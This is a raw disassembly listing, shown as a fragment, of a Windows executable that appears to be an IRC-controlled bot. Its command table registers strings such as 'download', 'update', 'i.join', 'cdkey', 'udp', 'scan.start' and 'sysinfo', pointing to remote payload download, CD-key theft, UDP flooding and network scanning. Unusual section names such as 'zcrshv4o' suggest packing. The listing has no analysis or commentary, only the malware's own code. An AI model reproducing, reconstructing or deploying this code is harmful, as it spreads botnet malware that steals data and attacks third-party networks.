		xor	ecx, eax
		call	sub_402C9E
		mov	ecx, [edx-4]
		xor	ecx, eax
		call	sub_402C9E
		mov	eax, offset dword_4230F8
		jmp	sub_40484E
; ---------------------------------------------------------------------------
		push	dword ptr [ebp-228h]
		call	sub_4034FB
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41CEDE:				; DATA XREF: sub_402385+5o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-22Ch]
		xor	ecx, eax
		call	sub_402C9E
		mov	ecx, [edx-4]
		xor	ecx, eax
		call	sub_402C9E
		mov	eax, offset dword_423128
		jmp	sub_40484E
; ---------------------------------------------------------------------------
		push	dword ptr [ebp-13Ch]
		call	sub_4034FB
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41CF13:				; DATA XREF: sub_401EF9+8o
		mov	edx, [esp+8]
		lea	eax, [edx-13Ch]
		mov	ecx, [edx-140h]
		xor	ecx, eax
		call	sub_402C9E
		add	eax, 0Ch
		mov	ecx, [edx-8]
		xor	ecx, eax
		call	sub_402C9E
		mov	eax, offset dword_423158
		jmp	sub_40484E
; ---------------------------------------------------------------------------
		push	dword ptr [ebp-4BCh]
		call	sub_4034FB
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41CF4E:				; DATA XREF: sub_4019F3+5o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-4C8h]
		xor	ecx, eax
		call	sub_402C9E
		mov	ecx, [edx-4]
		xor	ecx, eax
		call	sub_402C9E
		mov	eax, offset dword_423188
		jmp	sub_40484E
; ---------------------------------------------------------------------------
		push	dword ptr [ebp-4C0h]
		call	sub_4034FB
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41CF83:				; DATA XREF: sub_40177B+5o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-4C8h]
		xor	ecx, eax
		call	sub_402C9E
		mov	ecx, [edx-4]
		xor	ecx, eax
		call	sub_402C9E
		mov	eax, offset dword_4231B8
		jmp	sub_40484E
; ---------------------------------------------------------------------------

loc_41CFAB:				; DATA XREF: zcrshv4o:0041E28Co
		call	sub_401291
		and	dword_437E44, 0
		push	offset loc_41D1B3
		mov	dword_437E40, eax
		call	sub_4033AF
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41CFC8:				; DATA XREF: zcrshv4o:0041E290o
		call	sub_40172D
		and	dword_437E50, 0
		push	offset loc_41D1FC
		mov	dword_437E4C, eax
		call	sub_4033AF
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41CFE5:				; DATA XREF: zcrshv4o:0041E294o
		push	esi
		push	offset aDownload ; "download"
		mov	esi, offset off_437E58
		call	sub_41C71F
		mov	off_437E58, offset off_421C64
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D001:				; DATA XREF: zcrshv4o:0041E298o
		push	esi
		push	offset aUpdate	; "update"
		mov	esi, offset off_437E54
		call	sub_41C71F
		mov	off_437E54, offset off_421C6C
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D01D:				; DATA XREF: zcrshv4o:0041E29Co
		push	esi
		push	offset aI_quit	; "i.quit"
		mov	esi, offset off_437E64
		call	sub_41C71F
		mov	off_437E64, offset off_421CE0
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D039:				; DATA XREF: zcrshv4o:0041E2A0o
		push	esi
		push	offset aI_join	; "i.join"
		mov	esi, offset off_437E5C
		call	sub_41C71F
		mov	off_437E5C, offset off_421CE8
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D055:				; DATA XREF: zcrshv4o:0041E2A4o
		push	esi
		push	offset aI_part	; "i.part"
		mov	esi, offset off_437E60
		call	sub_41C71F
		mov	off_437E60, offset off_421CF0
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D071:				; DATA XREF: zcrshv4o:0041E2A8o
		push	esi
		push	offset aUptime	; "uptime"
		mov	esi, offset off_437E68
		call	sub_41C71F
		mov	off_437E68, offset off_421D54
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D08D:				; DATA XREF: zcrshv4o:0041E2ACo
		push	esi
		push	offset aHttp	; "http"
		mov	esi, offset off_437E6C
		call	sub_41C71F
		mov	off_437E6C, offset off_421D5C
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D0A9:				; DATA XREF: zcrshv4o:0041E2B0o
		push	esi
		push	offset aCdkey	; "cdkey"
		mov	esi, offset off_437E70
		call	sub_41C71F
		mov	off_437E70, offset off_421D64
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D0C5:				; DATA XREF: zcrshv4o:0041E2B4o
		push	esi
		push	offset aS4	; "s4"
		mov	esi, offset off_437E78
		call	sub_41C71F
		mov	off_437E78, offset off_421DB0
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D0E1:				; DATA XREF: zcrshv4o:0041E2B8o
		push	esi
		push	offset aS4_stop	; "s4.stop"
		mov	esi, offset off_437E74
		call	sub_41C71F
		mov	off_437E74, offset off_421DB8
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D0FD:				; DATA XREF: zcrshv4o:0041E2BCo
		push	esi
		push	offset aSysinfo	; "sysinfo"
		mov	esi, offset off_437E7C
		call	sub_41C71F
		mov	off_437E7C, offset off_421E7C
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D119:				; DATA XREF: zcrshv4o:0041E2C0o
		push	esi
		push	offset aNetinfo	; "netinfo"
		mov	esi, offset off_437E80
		call	sub_41C71F
		mov	off_437E80, offset off_421E84
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D135:				; DATA XREF: zcrshv4o:0041E2C4o
		push	esi
		push	offset aUdp	; "udp"
		mov	esi, offset off_437E84
		call	sub_41C71F
		mov	off_437E84, offset off_421EB0
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D151:				; DATA XREF: zcrshv4o:0041E2C8o
		mov	eax, dword_426824
		add	eax, 6
		mov	dword_437E88, eax
		retn
; ---------------------------------------------------------------------------

loc_41D15F:				; DATA XREF: zcrshv4o:0041E2CCo
		push	esi
		push	offset aScan_start ; "scan.start"
		mov	esi, offset off_437E94
		call	sub_41C71F
		mov	off_437E94, offset off_422000
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D17B:				; DATA XREF: zcrshv4o:0041E2D0o
		push	esi
		push	offset aScan_stop ; "scan.stop"
		mov	esi, offset off_437E8C
		call	sub_41C71F
		mov	off_437E8C, offset nullsub_469
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D197:				; DATA XREF: zcrshv4o:0041E2D4o
		push	esi
		push	offset dword_41FF10
		mov	esi, offset off_437E90
		call	sub_41C71F
		mov	off_437E90, offset off_422010
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D1B3:				; DATA XREF: .text:0041CFB7o
		mov	eax, dword_437E40
		mov	ecx, [eax]
		mov	[eax], eax
		mov	eax, dword_437E40
		mov	[eax+4], eax
		and	dword_437E44, 0
		cmp	ecx, dword_437E40
		jz	short loc_41D1E8
		push	esi

loc_41D1D4:				; CODE XREF: .text:0041D1E5j
		mov	esi, [ecx]
		push	ecx
		call	sub_4034FB
		cmp	esi, dword_437E40
		pop	ecx
		mov	ecx, esi
		jnz	short loc_41D1D4
		pop	esi

loc_41D1E8:				; CODE XREF: .text:0041D1D1j
		push	dword_437E40
		call	sub_4034FB
		and	dword_437E40, 0
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41D1FC:				; DATA XREF: .text:0041CFD4o
		mov	eax, dword_437E4C
		mov	ecx, [eax]
		mov	[eax], eax
		mov	eax, dword_437E4C
		mov	[eax+4], eax
		and	dword_437E50, 0
		cmp	ecx, dword_437E4C
		jz	short loc_41D231
		push	esi

loc_41D21D:				; CODE XREF: .text:0041D22Ej
		mov	esi, [ecx]
		push	ecx
		call	sub_4034FB
		cmp	esi, dword_437E4C
		pop	ecx
		mov	ecx, esi
		jnz	short loc_41D21D
		pop	esi

loc_41D231:				; CODE XREF: .text:0041D21Aj
		push	dword_437E4C
		call	sub_4034FB
		and	dword_437E4C, 0
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41D245:				; DATA XREF: sub_4035D9+40o
		mov	dword_4285A4, offset off_41E334
		mov	ecx, offset dword_4285A4
		jmp	sub_403258
; ---------------------------------------------------------------------------
		align 1000h
_text		ends

; Section 2. (virtual address 0001E000)
; Virtual size			: 00006000 (  24576.)
; Section size in file		: 00006000 (  24576.)
; Offset to raw	data for section: 0001E000
; Flags	E0000060: Text Data Executable Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
zcrshv4o	segment	para public 'CODE' use32
		assume cs:zcrshv4o
		;org 41E000h
		assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
off_41E000	dd offset sub_43C9E9	; DATA XREF: sub_417BB2+39r
					; k2vbe3.d:off_441788o	...
off_41E004	dd offset sub_44AD9D	; DATA XREF: sub_417ADF+1Dr
					; sub_417BB2+1Br
off_41E008	dd offset sub_44BDBB	; DATA XREF: sub_414954+142r
					; sub_417B4D+31r
off_41E00C	dd offset sub_447692	; DATA XREF: sub_417ADF+52r
off_41E010	dd offset sub_44F655	; DATA XREF: sub_414954+253r
					; sub_414954+26Cr ...
off_41E014	dd offset sub_448B5E	; DATA XREF: sub_41A465+3Cr
					; k2vbe3.d:004446D6w ...
off_41E018	dd offset sub_4580DF	; DATA XREF: sub_41A89D+A5r
					; sub_41A89D+1B6r ...
off_41E01C	dd offset sub_43C067	; DATA XREF: sub_41A390+82r
					; k2vbe3.d:00451950r ...
off_41E020	dd offset sub_45775D	; DATA XREF: sub_41A6CF+132r
					; k2vbe3.d:00457033r
off_41E024	dd offset sub_44C6A4	; DATA XREF: sub_41A84D+Cr
					; sub_441850+135C9w ...
off_41E028	dd offset sub_456338	; DATA XREF: sub_41A390+24r
					; sub_456338+5r ...
off_41E02C	dd offset sub_457D4B	; DATA XREF: sub_414954+FCr
					; sub_417B4D+14r ...
off_41E030	dd offset sub_4440A5	; DATA XREF: sub_41AAD0+299r
					; sub_4440A5+5r ...
off_41E034	dd offset sub_43CCD0	; DATA XREF: sub_41A465+19r
					; k2vbe3.d:00442796w ...
off_41E038	dd offset sub_4427AA	; DATA XREF: sub_41AAD0+27Dr
					; sub_4427AA+5r ...
off_41E03C	dd offset sub_44EC4A	; DATA XREF: sub_41A84D+2Er
					; k2vbe3.d:004431D0r ...
off_41E040	dd offset sub_446243	; DATA XREF: sub_41A84D+3Br
					; k2vbe3.d:0043D4B6w ...
off_41E044	dd offset sub_43FD26	; DATA XREF: sub_41A84D+1Er
					; sub_43FD26+5r ...
off_41E048	dd offset sub_449488	; DATA XREF: sub_402129+110r
					; k2vbe3.d:00447724r
		align 10h
off_41E050	dd offset sub_44A8B1	; DATA XREF: sub_407E67+Er
					; sub_41A0A7+168r ...
off_41E054	dd offset sub_458F0C	; DATA XREF: sub_410870+22r
					; sub_419A9F+29r ...
dword_41E058	dd 77E802FCh		; DATA XREF: sub_40B64A+5Dr
					; sub_419A20+Br ...
dword_41E05C	dd 77E61BB8h		; DATA XREF: sub_419E99+8Br
					; k2vbe3.d:004449B0w ...
dword_41E060	dd 77E7A099h		; DATA XREF: sub_40A074+99r
					; sub_40B414+2Ar ...
off_41E064	dd offset sub_4573B7	; DATA XREF: sub_419A20+19r
					; k2vbe3.d:0043D8D5w ...
dword_41E068	dd 77E7C657h		; DATA XREF: .text:00404550r
					; sub_419AD1+24r ...
off_41E06C	dd offset sub_44ECA6	; DATA XREF: sub_40E632+234r
					; sub_4119EB+13r ...
off_41E070	dd offset sub_4526DA	; DATA XREF: sub_4191D2+31Er
					; k2vbe3.d:00446AA5w ...
off_41E074	dd offset sub_4594AE	; DATA XREF: sub_40D27E+40r
					; sub_410D1B+2Dr ...
off_41E078	dd offset sub_4518B9	; DATA XREF: sub_40A36D+17Fr
					; sub_40A36D+2A3r ...
off_41E07C	dd offset sub_449067	; DATA XREF: sub_414D0E+5Er
					; sub_41B3E7+642r ...
dword_41E080	dd 77E6BD13h		; DATA XREF: sub_41C77E+196r
					; k2vbe3.d:0043EDA3r ...
off_41E084	dd offset sub_452C21	; DATA XREF: sub_41C77E+2D5r
					; k2vbe3.d:0043E3E9w ...
off_41E088	dd offset sub_43E3FD	; DATA XREF: sub_40A074+194r
					; sub_40D41A+212r ...
off_41E08C	dd offset sub_44E503	; DATA XREF: sub_4033CB+AAr
					; sub_404C4E+B9r ...
off_41E090	dd offset sub_44AD77	; DATA XREF: sub_414D0E+1Cr
					; sub_41BF50+161r ...
off_41E094	dd offset sub_43D31B	; DATA XREF: sub_414C86+8r
					; k2vbe3.d:0044EAF2r ...
off_41E098	dd offset sub_45672B	; DATA XREF: sub_402129+B3r
					; sub_457F1C-8853w ...
off_41E09C	dd offset sub_447664	; DATA XREF: sub_41B3E7+5B4r
					; k2vbe3.d:00446ED5w ...
dword_41E0A0	dd 77E77CCEh		; DATA XREF: sub_40A36D+3E7r
					; sub_40C517:loc_40C5C4r ...
off_41E0A4	dd offset sub_448028	; DATA XREF: sub_410B67+14Cr
					; sub_44803D:loc_44065Aw ...
off_41E0A8	dd offset sub_459ADA	; DATA XREF: sub_410A9C+45r
					; sub_459ADA+5r
off_41E0AC	dd offset sub_4583AD	; DATA XREF: sub_410A9C+78r
					; sub_44E8E0+Fw ...
off_41E0B0	dd offset sub_44E903	; DATA XREF: sub_410A9C+9Br
					; k2vbe3.d:0043C704w ...
off_41E0B4	dd offset sub_4532AD	; DATA XREF: sub_40F60F+8Cr
					; sub_45024C:loc_452F4Cw ...
off_41E0B8	dd offset sub_44E004	; DATA XREF: sub_40F23F:loc_40F293r
					; sub_40F2BC:loc_40F314r ...
dword_41E0BC	dd 77E79824h		; DATA XREF: sub_41A21C+39r
					; k2vbe3.d:00447F2Cr ...
dword_41E0C0	dd 77E7C4B7h		; DATA XREF: sub_41A21C+50r
					; k2vbe3.d:0043F8FEw ...
dword_41E0C4	dd 77E79E4Bh		; DATA XREF: sub_41A21C+6Fr
					; sub_452CF7-4362w ...
dword_41E0C8	dd 77E79C90h		; DATA XREF: sub_4033CB+D9r
					; sub_404C4E+F5r ...
off_41E0CC	dd offset sub_4554A6	; DATA XREF: sub_41AA85+20r
					; sub_41C77E+26Er ...
off_41E0D0	dd offset sub_44E18C	; DATA XREF: sub_41A578+3Br
					; k2vbe3.d:0044DA02r ...
off_41E0D4	dd offset sub_44ED2C	; DATA XREF: sub_41A5DC+3Br
					; sub_44D6B7+4w ...
off_41E0D8	dd offset sub_443E8D	; DATA XREF: sub_40900D+4Br
					; sub_40E632+29Cr ...
dword_41E0DC	dd 77E77CC4h		; DATA XREF: sub_4058DA+60r
					; sub_405A96+169r ...
dword_41E0E0	dd 77E79F93h		; DATA XREF: sub_4056E7+39r
					; sub_405753+39r ...
off_41E0E4	dd offset sub_44B8EF	; DATA XREF: sub_40FAE4+2Dr
					; sub_41A2A7+30r ...
off_41E0E8	dd offset sub_45000F	; DATA XREF: sub_4056E7+49r
					; sub_405753+49r ...
dword_41E0EC	dd 77F5157Dh		; DATA XREF: sub_403B91+79r
					; sub_4058DA+2r ...
dword_41E0F0	dd 77E704FCh		; DATA XREF: sub_402129+11Fr
					; sub_417C06+D1r ...
off_41E0F4	dd offset sub_43DEBE	; DATA XREF: sub_4033CB+E0r
					; sub_404C4E+FCr ...
off_41E0F8	dd offset sub_453E94	; DATA XREF: sub_407CFA+1Dr
					; sub_407D3A+25r ...
dword_41E0FC	dd 77E77CB7h		; DATA XREF: .text:0040452Br
					; sub_410B67+67r ...
off_41E100	dd offset sub_451CC3	; DATA XREF: sub_41AAD0:loc_41AD38r
					; k2vbe3.d:004488A3w ...
dword_41E104	dd 77E7751Ah		; DATA XREF: sub_40B64A+51r
					; sub_41810B+36r ...
dword_41E108	dd 77F51597h		; DATA XREF: sub_403B91+68r
					; .text:00404560r ...
off_41E10C	dd offset sub_45439E	; DATA XREF: sub_41BD4E+20r
					; sub_41BF50+43r ...
dword_41E110	dd 77F516F8h		; DATA XREF: sub_403C6E+Fr
					; .text:00404534r ...
off_41E114	dd offset sub_45B592	; DATA XREF: sub_40D41A+11Dr
					; sub_448FDB+13w ...
off_41E118	dd offset sub_43EDE6	; DATA XREF: sub_40D41A:loc_40D553r
					; sub_44B58F:loc_43EE6Ew ...
off_41E11C	dd offset sub_43EE82	; DATA XREF: .text:0040D0C8r
					; k2vbe3.d:0043DC40w ...
dword_41E120	dd 77E7C866h		; DATA XREF: sub_40C8FC+2Dr
					; sub_40C8FC+11Cr ...
off_41E124	dd offset sub_448D6F	; DATA XREF: sub_40C8FC+191r
					; sub_456C5F-137E9w ...
dword_41E128	dd 77E781F9h		; DATA XREF: sub_40C517+30r
					; sub_40C517+144r ...
off_41E12C	dd offset sub_441FCC	; DATA XREF: sub_40C517+294r
					; sub_40C517+365r ...
dword_41E130	dd 77E77EE1h		; DATA XREF: sub_40B4CD+Br
					; k2vbe3.d:004416F4w ...
dword_41E134	dd 77E79924h		; DATA XREF: sub_40B4CD:loc_40B547r
					; sub_40C517+216r ...
dword_41E138	dd 77E7C9E1h		; DATA XREF: sub_40B4CD+CCr
					; sub_44D594:loc_43E6C0w ...
off_41E13C	dd offset sub_43E6D4	; DATA XREF: sub_40B4CD:loc_40B5ABr
					; k2vbe3.d:0044C495r ...
off_41E140	dd offset sub_452D81	; DATA XREF: sub_40B4CD+10Fr
					; sub_40B4CD+126r ...
dword_41E144	dd 77E78406h		; DATA XREF: sub_408DA0+12Br
					; sub_408DA0+1C7r ...
dword_41E148	dd 77E79C3Dh		; DATA XREF: sub_408DA0+1B5r
					; sub_40A074+169r ...
dword_41E14C	dd 77E7C931h		; DATA XREF: sub_408DA0+21Fr
					; k2vbe3.d:0044DD75r ...
off_41E150	dd offset sub_44FF7D	; DATA XREF: sub_406424+27r
					; sub_40E02D+134r ...
off_41E154	dd offset sub_4440DA	; DATA XREF: sub_406424+77r
					; sub_4064D4+52r ...
off_41E158	dd offset sub_458658	; DATA XREF: sub_406110+22Fr
					; sub_458658:loc_44FDA1r
dword_41E15C	dd 77E7C726h		; DATA XREF: sub_406043+11r
					; k2vbe3.d:loc_450712w	...
off_41E160	dd offset sub_450726	; DATA XREF: sub_406043+47r
					; sub_4412A1+9w ...
dword_41E164	dd 77F7E21Fh		; DATA XREF: sub_405FB7+28r
					; sub_40871B+28r ...
dword_41E168	dd 77F7E300h		; DATA XREF: sub_405EDF+Dr
					; sub_40876D+28r ...
off_41E16C	dd offset sub_445FD0	; DATA XREF: sub_405E8A+1r
					; sub_40E593+62r ...
dword_41E170	dd 77F51587h		; DATA XREF: sub_4058DA+78r
					; sub_40D0D4+ABr ...
off_41E174	dd offset sub_44B73E	; DATA XREF: sub_4057E9+2Br
					; sub_405A96+85r ...
dword_41E178	dd 77E79B39h		; DATA XREF: sub_4057BF+23r
					; sub_405A96+58r ...
dword_41E17C	dd 77E7C5B4h		; DATA XREF: sub_4057B6r
					; sub_405A96:loc_405B35r ...
dword_41E180	dd 77E78B61h		; DATA XREF: sub_4056E7+7r
					; sub_405753+7r ...
off_41E184	dd offset sub_456C54	; DATA XREF: sub_405004+27r
					; sub_4517AE-3705w ...
dword_41E188	dd 77E7A13Fh		; DATA XREF: sub_405004+4Ar
					; k2vbe3.d:0045B6C4r
dword_41E18C	dd 77E778C5h		; DATA XREF: sub_404F60+59r
					; sub_405229+76r ...
dword_41E190	dd 77F522F2h		; DATA XREF: sub_402FD3+82r
					; k2vbe3.d:0043F912w ...
dword_41E194	dd 77E80656h		; DATA XREF: sub_403076r
					; sub_40B64A+41r ...
off_41E198	dd offset sub_444585	; DATA XREF: sub_4033CB+BEr
					; sub_404C4E+D9r ...
dword_41E19C	dd 77E7C9E7h		; DATA XREF: sub_4033CB+B4r
					; sub_404C4E+CEr ...
off_41E1A0	dd offset sub_4426DF	; DATA XREF: sub_403ACE+9r
					; sub_40B64A+35r
off_41E1A4	dd offset sub_44CA34	; DATA XREF: .text:loc_40460Fr
off_41E1A8	dd offset sub_4506C3	; DATA XREF: .text:00404516r
					; sub_408DA0+15r
off_41E1AC	dd offset sub_455829	; DATA XREF: sub_40477B+40r
					; sub_40FE06+222r ...
off_41E1B0	dd offset sub_44B067	; DATA XREF: sub_413F36r sub_44B067+5r ...
dword_41E1B4	dd 77E7849Fh		; DATA XREF: sub_404DD6+24r
					; sub_40507E+56r ...
dword_41E1B8	dd 77E777EFh		; DATA XREF: sub_404F60+84r
					; sub_405229+95r ...
		align 10h
dword_41E1C0	dd 71B2ACCBh		; DATA XREF: sub_402BD0r
		align 8
dword_41E1C8	dd 1F7CD927h		; DATA XREF: sub_402BC4r
dword_41E1CC	dd 1F7CB8F8h		; DATA XREF: sub_402BBEr
dword_41E1D0	dd 1F7CD214h		; DATA XREF: sub_402BB8r
dword_41E1D4	dd 1F7D886Ah		; DATA XREF: sub_402BB2r
dword_41E1D8	dd 1F7BA3A9h		; DATA XREF: sub_402BACr
		align 10h
dword_41E1E0	dd 77428B97h		; DATA XREF: sub_419D3D+148r
					; sub_41C4C0+1E3r
		align 8
off_41E1E8	dd offset sub_44D0C0	; DATA XREF: sub_41810B+30r
					; k2vbe3.d:004499D8w ...
off_41E1EC	dd offset sub_4499EC	; DATA XREF: sub_4198C0+67r
					; k2vbe3.d:004410BFr ...
off_41E1F0	dd offset sub_45914F	; DATA XREF: sub_4198C0+Cr
					; sub_44BECA-93BAw ...
off_41E1F4	dd offset sub_456FE2	; DATA XREF: sub_4198C0+B1r
					; sub_456FED-8EA8w ...
off_41E1F8	dd offset sub_446B19	; DATA XREF: sub_4198C0+94r
					; sub_446B19:loc_44080Ar ...
off_41E1FC	dd offset loc_44C375	; DATA XREF: sub_41976B+Dr
					; k2vbe3.d:00442777w ...
off_41E200	dd offset sub_442C97	; DATA XREF: sub_4198C0+BBr
					; sub_442C97+5r
off_41E204	dd offset sub_44F946	; DATA XREF: sub_4198C0+A5r
					; k2vbe3.d:004413E0w ...
off_41E208	dd offset sub_4413F4	; DATA XREF: sub_4198C0+4Ar
					; k2vbe3.d:0043C9D5w ...
		align 10h
dword_41E210	dd 7620BD61h		; DATA XREF: sub_41C4C0+EBr
dword_41E214	dd 76214750h		; DATA XREF: sub_41C4C0+7Dr
dword_41E218	dd 7620AFB6h		; DATA XREF: sub_41C4C0+39r
		align 10h
dword_41E220	dd 71AB3C22h		; DATA XREF: sub_413F3C+20r
					; sub_41463A+C9r ...
dword_41E224	dd 71ABD755h		; DATA XREF: sub_4022EB+48r
					; sub_4191D2+4F9r
dword_41E228	dd 71AB1AF4h		; DATA XREF: sub_41452B+B0r
					; sub_41452B+F1r ...
dword_41E22C	dd 71AB60C9h		; DATA XREF: sub_41979F+FAr
dword_41E230	dd 71AB5DE2h		; DATA XREF: sub_4147B2+B7r
					; sub_41979F+10Cr
dword_41E234	dd 71AB868Dh		; DATA XREF: sub_4147B2+165r
					; sub_418FDD+1Ar
dword_41E238	dd 71AB157Eh		; DATA XREF: sub_419C46+34r
dword_41E23C	dd 71AB3E5Dh		; DATA XREF: sub_413F3C+78r
					; sub_41463A+DCr ...
dword_41E240	dd 71AB1836h		; DATA XREF: sub_41C77E:loc_41CBDFr
dword_41E244	dd 71AB2BBFh		; DATA XREF: sub_418CAF+7Br
					; sub_41C2A3+71r
dword_41E248	dd 71AB1ED3h		; DATA XREF: sub_41BD4E+F7r
					; sub_41C2A3+18Dr
dword_41E24C	dd 71AB3F8Dh		; DATA XREF: sub_41BF50+58r
dword_41E250	dd 71AB1746h		; DATA XREF: sub_41BD4E+131r
					; sub_41BD4E+147r ...
dword_41E254	dd 71AB1890h		; DATA XREF: sub_413F3C+8Fr
					; sub_41452B+78r ...
dword_41E258	dd 71AB1444h		; DATA XREF: sub_41BD4E+11Cr
					; sub_41BF50+12Cr
dword_41E25C	dd 71AB401Ch		; DATA XREF: sub_41B3E7+3Cr
					; sub_41B3E7+6E4r ...
dword_41E260	dd 71AB1B7Bh		; DATA XREF: sub_402BCAr
dword_41E264	dd 71AB12F8h		; DATA XREF: sub_4022EB+37r
					; sub_41C2A3+5Ar
dword_41E268	dd 71AB155Ah		; DATA XREF: sub_413F3C+54r
dword_41E26C	dd 71AB5690h		; DATA XREF: sub_41452B+14r
					; sub_41463A+64r ...
dword_41E270	dd 71AB1746h		; DATA XREF: sub_413F3C+34r
					; sub_4147B2+81r ...
dword_41E274	dd 71AB41DAh		; DATA XREF: sub_41C77E+399r
dword_41E278	dd 71ABF628h		; DATA XREF: sub_4191D2+4C9r
dword_41E27C	dd 71AB3ECEh		; DATA XREF: sub_4147B2+9Er
					; sub_41979F+D7r ...
dword_41E280	dd 71AB1A6Dh		; DATA XREF: sub_402086+11r
					; sub_413F3C+98r ...
		align 8
dword_41E288	dd 0			; DATA XREF: sub_407F39+49o
		dd offset loc_41CFAB
		dd offset loc_41CFC8
		dd offset loc_41CFE5
		dd offset loc_41D001
		dd offset loc_41D01D
		dd offset loc_41D039
		dd offset loc_41D055
		dd offset loc_41D071
		dd offset loc_41D08D
		dd offset loc_41D0A9
		dd offset loc_41D0C5
		dd offset loc_41D0E1
		dd offset loc_41D0FD
		dd offset loc_41D119
		dd offset loc_41D135
		dd offset loc_41D151
		dd offset loc_41D15F
		dd offset loc_41D17B
		dd offset loc_41D197
dword_41E2D8	dd 0			; DATA XREF: sub_407F39+50o
dword_41E2DC	dd 0			; DATA XREF: sub_407F39+2Do
		dd offset sub_403344
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		db 53h,	40h, 0
		dd offset sub_40864A
		dd offset sub_40AEEF
		dd offset sub_40FDF9
		dd offset sub_40B74A
dword_41E2F8	dd 0			; DATA XREF: sub_407F39+28o
dword_41E2FC	dd 0			; DATA XREF: sub_407FCB+73o
		dd offset sub_411A0A
		dd offset sub_4086FB
dword_41E308	dd 0			; DATA XREF: sub_407FCB:loc_408039o
dword_41E30C	dd 0			; DATA XREF: sub_407FCB+83o
		dd offset sub_40B76B
dword_41E314	dd 3 dup(0)		; DATA XREF: sub_407FCB:loc_408049o
dword_41E320	dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh, 42224Ch
					; DATA XREF: .data:00424000o
					; .data:00424004o ...
off_41E334	dd offset loc_401043	; DATA XREF: sub_401038o
					; .text:00401046o ...
		dd offset sub_40326E
		dd offset dword_422200
off_41E340	dd offset loc_4010C5	; DATA XREF: sub_401065+20o
					; sub_40109A+Ao ...
		dd offset sub_4010B7
		dd offset dword_4221B0
off_41E34C	dd offset loc_4010EC	; DATA XREF: .text:loc_4010E1o
					; .text:004010EFo ...
		dd offset sub_4010B7
		dd offset dword_422070
off_41E358	dd offset loc_402BE6	; DATA XREF: sub_402BDBo
					; .text:00402BE9o ...
		dd offset sub_4010B7
aStringTooLong	db 'string too long',0  ; DATA XREF: sub_402C08+Co
aInvalidStringP	db 'invalid string position',0 ; DATA XREF: sub_402C47+Co
		dd offset dword_4220C0
off_41E38C	dd offset loc_40327B	; DATA XREF: sub_403189+Ao
					; sub_40319A+9o ...
		dd offset sub_40326E
aUnknownExcepti	db 'Unknown exception',0 ; DATA XREF: sub_40326E+7o
		align 4
		dd offset dword_4220D4
off_41E3AC	dd offset loc_403589	; DATA XREF: sub_40357B+1o
					; .data:off_424008o ...
oword_41E3B0	xmmword	3FF00000000000003FF0000000000000h ; DATA XREF: sub_404380+E3r
					; sub_404380+10Ar
oword_41E3C0	xmmword	4330000000000000433h ; DATA XREF: sub_404380+46r
oword_41E3D0	xmmword	0		; DATA XREF: sub_404380:loc_404481r
oword_41E3E0	xmmword	7FFh		; DATA XREF: sub_404380+5Fr
dbl_41E3F0	db 0, 0, 0, 0, 0, 0, 0,	80h ; DATA XREF: sub_404380:loc_40447Ar
dword_41E3F8	dd 0E06D7363h, 1, 2 dup(0) ; DATA XREF:	sub_40477B+Eo
		dd 3, 19930520h, 2 dup(0)
off_41E418	dd offset dword_4285C0	; DATA XREF: sub_404C4E+D4o
		dd offset dword_428618
		dd 4030201h, 8070605h, 0C0B0A09h, 100F0E0Dh, 14131211h
		dd 18171615h, 1C1B1A19h, 201F1E1Dh, 24232221h, 28272625h
		dd 2C2B2A29h, 302F2E2Dh, 34333231h, 38373635h, 3C3B3A39h
		dd 403F3E3Dh, 44434241h, 48474645h, 4C4B4A49h, 504F4E4Dh
		dd 54535251h, 58575655h, 5C5B5A59h, 605F5E5Dh, 64636261h
		dd 68676665h, 6C6B6A69h, 706F6E6Dh, 74737271h, 78777675h
		dd 7C7B7A79h, 7F7E7Dh
byte_41E4A0	db 3Dh,	0		; DATA XREF: zcrshv4o:0041FBB0o
word_41E4A2	dw 0			; DATA XREF: sub_40B144+1Bo
					; zcrshv4o:0041FB90o ...
aEncodepointer	db 'EncodePointer',0    ; DATA XREF: sub_4056E7+43o
					; sub_405826+2Eo
		align 4
aKernel32_dll	db 'KERNEL32.DLL',0     ; DATA XREF: sub_4056E7:loc_40571Bo
					; sub_405753:loc_405787o ...
		align 4
aDecodepointer	db 'DecodePointer',0    ; DATA XREF: sub_405753+43o
					; sub_405826+42o
		align 4
aFlsfree	db 'FlsFree',0          ; DATA XREF: sub_405A96+44o
aFlssetvalue	db 'FlsSetValue',0      ; DATA XREF: sub_405A96+37o
aFlsgetvalue	db 'FlsGetValue',0      ; DATA XREF: sub_405A96+2Ao
dword_41E4F4	dd 41736C46h		; DATA XREF: sub_405A96+22o
byte_41E4F8	db 6Ch			; DATA XREF: sub_406F97+177r
		db 6Ch,	6Fh, 63h
		align 10h
aNull:					; DATA XREF: .data:off_424928o
